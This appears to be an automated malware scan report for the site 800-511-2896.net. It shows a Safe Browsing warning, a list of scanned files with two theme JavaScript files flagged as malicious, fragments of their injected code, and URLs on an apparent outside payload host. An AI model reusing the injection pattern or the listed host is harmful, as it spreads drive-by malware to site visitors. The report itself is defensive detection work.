Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=800-511-2896.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.800-511-2896.net/ | 200 OK Content-Length: 12103 Content-Type: text/html | clean |
http://www.800-511-2896.net/misc/jquery.js?1 | 200 OK Content-Length: 31089 Content-Type: application/javascript | clean |
http://www.800-511-2896.net/misc/drupal.js?1 | 200 OK Content-Length: 9834 Content-Type: application/javascript | clean |
http://www.800-511-2896.net/sites/all/themes/sea_breeze/script.js?1 | 200 OK Content-Length: 13055 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var artEventHelper = { 'bind' : function (obj, evt, fn) { if (obj.addEventListener) obj.addEventListener(evt, fn, false); else if (obj.attachEvent) obj.attachEvent('on' + evt, fn); else obj['on' + evt] = fn; } }; var artLoadEvent = (function() { var userAgent = navigator.userAgent.toLowerCase(); var browser = { version: (userAgent.match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/) || [])[1], safari: /webk /*/a9a007*/script>') /*/339810*/ Antivirus reports:
| ||
http://www.800-511-2896.net/sites/all/themes/sea_breeze/js/slidysearch.js | 200 OK Content-Length: 6706 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (Drupal.jsEnabled) { $(document).ready(function(){ sheight = $("#metatoolbox").height(); soffset = -1 * (sheight - 14); $('#metatoolbox').css({top: soffset}); $('#metatoolbox').hover( function() {$(this).animate({top:0}, 'slow', "bounceout", function(){$('#edit-search-theme-form-1').focus();})}, script>') /*/339810*/ Antivirus reports:
| ||
http://iyiokurmetal.com/r9y6mwmp.php?id=23853239 | 404 Not Found Content-Length: 3612 Content-Type: text/html | clean |
http://iyiokurmetal.com/test404page.js | 404 Not Found Content-Length: 3612 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 800-511-2896.net
Result:
GET / HTTP/1.1
Host: 800-511-2896.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 800-511-2896.net
Referer: http://www.google.com/search?q=800-511-2896.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 800-511-2896.net
Referer: http://www.google.com/search?q=800-511-2896.net
Result:
The result is similar to the first query. There are no suspicious redirects found.